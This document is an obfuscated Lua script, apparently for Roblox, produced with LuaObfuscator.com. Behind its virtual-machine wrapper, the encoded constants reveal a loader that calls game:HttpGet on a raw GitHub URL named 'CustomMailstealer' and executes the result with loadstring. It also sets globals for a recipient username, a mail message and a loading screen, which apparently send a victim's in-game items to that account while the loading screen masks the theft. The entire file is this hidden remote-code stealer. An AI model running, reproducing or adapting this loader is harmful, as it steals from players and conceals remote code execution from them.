--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v81=0;local v82;while true do if (v81==0) then v82=v2(v0(v30,16));if v19 then local v97=v5(v82,v19);v19=nil;return v97;else return v82;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v83=(v31/((5 -(1 + 2))^(v32-(2 -1))))%((3 -1)^(((v33-(2 -(878 -(282 + 595)))) -(v32-((2257 -(1523 + 114)) -(555 + 64)))) + (932 -(857 + 74)))) ;return v83-(v83%(569 -(367 + 201))) ;else local v84=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v84 + v84))>=v84) and (1 + 0)) or 0 ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (2 -0) );v18=v18 + (1067 -(68 + 997)) ;return (v36 * 256) + v35 ;end local function v23()local v37=1270 -(226 + (4149 -3105)) ;local v38;local v39;local v40;local v41;while true do if (v37==1) then return (v41 * (73054774 -56277558)) + (v40 * (65653 -(32 + 85))) + (v39 * (251 + 4 + 1)) + v38 ;end if (v37==(350 -(87 + 263))) then v38,v39,v40,v41=v1(v16,v18,v18 + (183 -(67 + 113)) );v18=v18 + 1 + 3 ;v37=958 -(892 + (1017 -(802 + 150))) ;end end end local function v24()local v42=v23();local v43=v23();local v44=(432 -(44 + 386)) -1 ;local v45=(v20(v43,1 -0 ,15 + 5 ) * ((999 -(915 + (1568 -(998 + 488))))^(90 -58))) + v42 ;local v46=v20(v43,13 + 8 ,40 -9 );local v47=((v20(v43,(388 + 831) -(1069 + 118) )==(2 -1)) and  -(1 -0)) or (1 + 0 + 0) ;if (v46==(0 -0)) then if (v45==(0 + 0)) then return v47 * (791 -((1140 -(201 + 571)) + 423)) ;else v46=3 -2 ;v44=18 -(10 + 8) ;end elseif (v46==(7874 -5827)) then return ((v45==(442 -(416 + 26))) and (v47 * (1/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-(440 + (1721 -(116 + 1022))) ) * (v44 + (v45/((3 -1)^(490 -(145 + 293))))) ;end local function v25(v48)local v49=0;local v50;local v51;while true do if (v49==(4 -(4 -1))) then v50=v3(v16,v18,(v18 + v48) -1 );v18=v18 + v48 ;v49=2 + (1080 -(1020 + 60)) ;end if (v49==(10 -7)) then return v6(v51);end if (v49==0) then v50=nil;if  not v48 then local v94=0 -0 ;while true do if (v94==(859 -(814 + 45))) then v48=v23();if (v48==(0 -0)) then return "";end break;end end end v49=1 + 0 ;end if (v49==(1 + (1424 -(630 + 793)))) then v51={};for v88=886 -((884 -623) + 624) , #v50 do v51[v88]=v2(v1(v3(v50,v88,v88)));end v49=14 -11 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v52~=4) then else while true do if (v53==(2 -1)) then v56=nil;v57=nil;v53=2;end if (v53==(1 + 1)) then local v95=0;while true do if (v95~=0) then else v58=nil;v59=nil;v95=1 -0 ;end if (v95==(1468 -(899 + 568))) then v53=2 + 1 ;break;end end end if ((0 -0)~=v53) then else local v96=0;while true do if (1~=v96) then else v53=1;break;end if (v96==(603 -(268 + 335))) then v54=290 -(60 + 230) ;v55=nil;v96=573 -(426 + 146) ;end end end if (v53==3) then v60=nil;while true do local v98=0 + 0 ;while true do if (v98~=0) then else if (2==v54) then local v126=0;while true do if (v126==(1456 -(282 + 1174))) then for v168=812 -(569 + 242) ,v23() do local v169=0 -0 ;local v170;local v171;local v172;while true do if (v169~=(0 + 0)) then else v170=1024 -(706 + 318) ;v171=nil;v169=1252 -(721 + 530) ;end if (v169==1) then v172=nil;while true do if (v170~=(1271 -(945 + 326))) then else local v182=0;while true do if (v182==0) then v171=0 -0 ;v172=nil;v182=1;end if (v182==1) then v170=1;break;end end end if ((1 + 0)==v170) then while true do if (v171==0) then v172=v21();if (v20(v172,701 -(271 + 429) ,1)==(0 + 0)) then local v186=1500 -(1408 + 92) ;local v187;local v188;local v189;local v190;while true do if (v186~=0) then else local v193=1086 -(461 + 625) ;while true do if (1==v193) then v186=1;break;end if (v193~=(1288 -(993 + 295))) then else v187=0;v188=nil;v193=1 + 0 ;end end end if ((1172 -(418 + 753))==v186) then v189=nil;v190=nil;v186=2;end if (v186==(1 + 1)) then while true do if (v187==3) then if (v20(v189,3,3)==(1 + 0)) then v190[4]=v60[v190[4]];end v55[v168]=v190;break;end if (v187==0) then local v195=0;while true do if (v195==1) then v187=1;break;end if (v195==(0 + 0)) then v188=v20(v172,1 + 1 ,3);v189=v20(v172,533 -(406 + 123) ,6);v195=1770 -(1749 + 20) ;end end end if (v187==2) then if (v20(v189,1,1)==(1 + 0)) then v190[2]=v60[v190[2]];end if (v20(v189,1324 -(1249 + 73) ,1 + 1 )~=1) then else v190[3]=v60[v190[3]];end v187=1148 -(466 + 679) ;end if (v187==(2 -1)) then local v196=0 -0 ;local v197;while true do if (v196~=(1900 -(106 + 1794))) then else v197=0;while true do if (v197==0) then v190={v22(),v22(),nil,nil};if (v188==(0 -0)) then local v205=114 -(4 + 110) ;local v206;local v207;while true do if (v205==1) then while true do if (v206==0) then v207=0;while true do if (0==v207) then v190[3]=v22();v190[588 -(57 + 527) ]=v22();break;end end break;end end break;end if (v205==0) then v206=0;v207=nil;v205=1428 -(41 + 1386) ;end end elseif (v188==1) then v190[3]=v23();elseif (v188==(105 -(17 + 86))) then v190[3]=v23() -((2 + 0)^(35 -19)) ;elseif (v188==3) then local v210=0 -0 ;local v211;local v212;while true do if (v210==1) then while true do if (v211~=0) then else v212=166 -(122 + 44) ;while true do if (v212~=(0 -0)) then else v190[3]=v23() -(2^16) ;v190[4]=v22();break;end end break;end end break;end if (v210==0) then v211=0;v212=nil;v210=1;end end end v197=3 -2 ;end if (v197==1) then v187=2;break;end end break;end end end end break;end end end break;end end break;end end break;end end end for v173=1,v23() do v56[v173-1 ]=v28();end v126=1;end if ((1 + 0)==v126) then return v58;end end end if (v54==(0 + 0)) then local v127=0 -0 ;local v128;while true do if (0~=v127) then else v128=65 -(30 + 35) ;while true do if (v128==(1 + 0)) then v57={};v58={v55,v56,nil,v57};v128=2;end if (v128==0) then local v180=1212 -(323 + 889) ;while true do if (v180==(0 -0)) then v55={};v56={};v180=581 -(361 + 219) ;end if (v180==(321 -(53 + 267))) then v128=1 + 0 ;break;end end end if (v128~=(415 -(15 + 398))) then else v54=1;break;end end break;end end end v98=1;end if (v98==(983 -(18 + 964))) then if (v54~=(3 -2)) then else local v129=0 + 0 ;while true do if ((2 + 0)~=v129) then else v54=852 -(20 + 830) ;break;end if (1==v129) then for v175=1 + 0 ,v59 do local v176=126 -(116 + 10) ;local v177;local v178;local v179;while true do if (v176==0) then local v181=0;while true do if (v181~=0) then else v177=0;v178=nil;v181=1 + 0 ;end if (v181==(739 -(542 + 196))) then v176=1;break;end end end if (v176==(1 -0)) then v179=nil;while true do if (v177~=0) then else local v183=0;local v184;while true do if (v183~=(0 + 0)) then else v184=0;while true do if (v184==(0 + 0)) then local v191=0;local v192;while true do if (0==v191) then v192=0 + 0 ;while true do if (v192==(0 -0)) then local v198=0;while true do if (v198==1) then v192=2 -1 ;break;end if (v198==(1551 -(1126 + 425))) then v178=v21();v179=nil;v198=1;end end end if (v192~=1) then else v184=1;break;end end break;end end end if (1==v184) then v177=1;break;end end break;end end end if (v177~=(406 -(118 + 287))) then else if (v178==1) then v179=v21()~=(0 -0) ;elseif (v178==2) then v179=v24();elseif (v178~=3) then else v179=v25();end v60[v175]=v179;break;end end break;end end end v58[1124 -(118 + 1003) ]=v21();v129=5 -3 ;end if (v129==(377 -(142 + 235))) then local v161=0;while true do if (v161==(0 -0)) then v59=v23();v60={};v161=1 + 0 ;end if (v161==(978 -(553 + 424))) then v129=1;break;end end end end end break;end end end break;end end break;end if (v52==2) then v57=nil;v58=nil;v52=5 -2 ;end if (1~=v52) then else v55=nil;v56=nil;v52=2;end if (v52~=(0 + 0)) then else v53=0 + 0 ;v54=nil;v52=1 + 0 ;end if (v52==(2 + 1)) then v59=nil;v60=nil;v52=4;end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v67=v64;local v68=v65;local v69=v66;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v85=0,v75 do if (v85>=v69) then v73[v85-v69 ]=v74[v85 + 1 ];else v77[v85]=v74[v85 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do v79=v67[v71];v80=v79[1];if (v80<=5) then if (v80<=2) then if (v80<=0) then v63[v79[3]]=v77[v79[2]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3];v71=v71 + 1 ;v79=v67[v71];v63[v79[3]]=v77[v79[2]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3];v71=v71 + 1 ;v79=v67[v71];v71=v79[3];elseif (v80==1) then local v107=v79[2];local v108,v109=v70(v77[v107](v13(v77,v107 + 1 ,v79[3])));v72=(v109 + v107) -1 ;local v110=0;for v123=v107,v72 do v110=v110 + 1 ;v77[v123]=v108[v110];end elseif ((v79[3]=="_ENV") or (v79[3]=="getfenv")) then v77[v79[2]]=v63;else v77[v79[2]]=v63[v79[3]];end elseif (v80<=3) then do return;end elseif (v80>4) then v77[v79[2]]=v79[3];else v77[v79[2]]();end elseif (v80<=8) then if (v80<=6) then local v103=v79[2];v77[v103]=v77[v103](v13(v77,v103 + 1 ,v72));elseif (v80==7) then local v113=0;local v114;local v115;while true do if (v113==0) then v114=v79[2];v115=v77[v79[3]];v113=1;end if (v113==1) then v77[v114 + 1 ]=v115;v77[v114]=v115[v79[4]];break;end end else local v116=0;local v117;local v118;local v119;local v120;local v121;while true do if (v116==5) then v77[v121]=v77[v121](v13(v77,v121 + 1 ,v72));v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]();v71=v71 + 1 ;v79=v67[v71];v116=6;end if (v116==0) then v117=nil;v118,v119=nil;v120=nil;v121=nil;v63[v79[3]]=v77[v79[2]];v71=v71 + 1 ;v116=1;end if (v116==3) then v79=v67[v71];v77[v79[2]]=v79[3];v71=v71 + 1 ;v79=v67[v71];v121=v79[2];v118,v119=v70(v77[v121](v13(v77,v121 + 1 ,v79[3])));v116=4;end if (v116==2) then v79=v67[v71];v121=v79[2];v120=v77[v79[3]];v77[v121 + 1 ]=v120;v77[v121]=v120[v79[4]];v71=v71 + 1 ;v116=3;end if (v116==4) then v72=(v119 + v121) -1 ;v117=0;for v157=v121,v72 do v117=v117 + 1 ;v77[v157]=v118[v117];end v71=v71 + 1 ;v79=v67[v71];v121=v79[2];v116=5;end if (1==v116) then v79=v67[v71];if ((v79[3]=="_ENV") or (v79[3]=="getfenv")) then v77[v79[2]]=v63;else v77[v79[2]]=v63[v79[3]];end v71=v71 + 1 ;v79=v67[v71];if ((v79[3]=="_ENV") or (v79[3]=="getfenv")) then v77[v79[2]]=v63;else v77[v79[2]]=v63[v79[3]];end v71=v71 + 1 ;v116=2;end if (v116==6) then v71=v79[3];break;end end end elseif (v80<=9) then v63[v79[3]]=v77[v79[2]];elseif (v80>10) then v71=v79[3];elseif (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end v71=v71 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0C3O00028O00026O00F03F030D3O00475F4D61696C6D652O7361676503093O00447570657065742O39030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034B3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269437573746F6D2F6D61696E2F437573746F6D4D61696C737465616C657203083O00557365726E616D65030A3O0072696E72696E6F616E67030F3O00475F4C6F6164696E675363722O656E030A3O0050726F6A6563742D574400163O0012053O00013O00260A3O000D0001000200040B3O000D0001001205000100043O001208000100033O00122O000100053O00122O000200063O00202O00020002000700122O000400086O000200046O00013O00024O00010001000100044O0015000100260A3O00010001000100040B3O000100010012050001000A3O00122O000100093O00122O0001000C3O00122O0001000B3O00124O00023O00044O000100012O00033O00017O00",v9(),...);
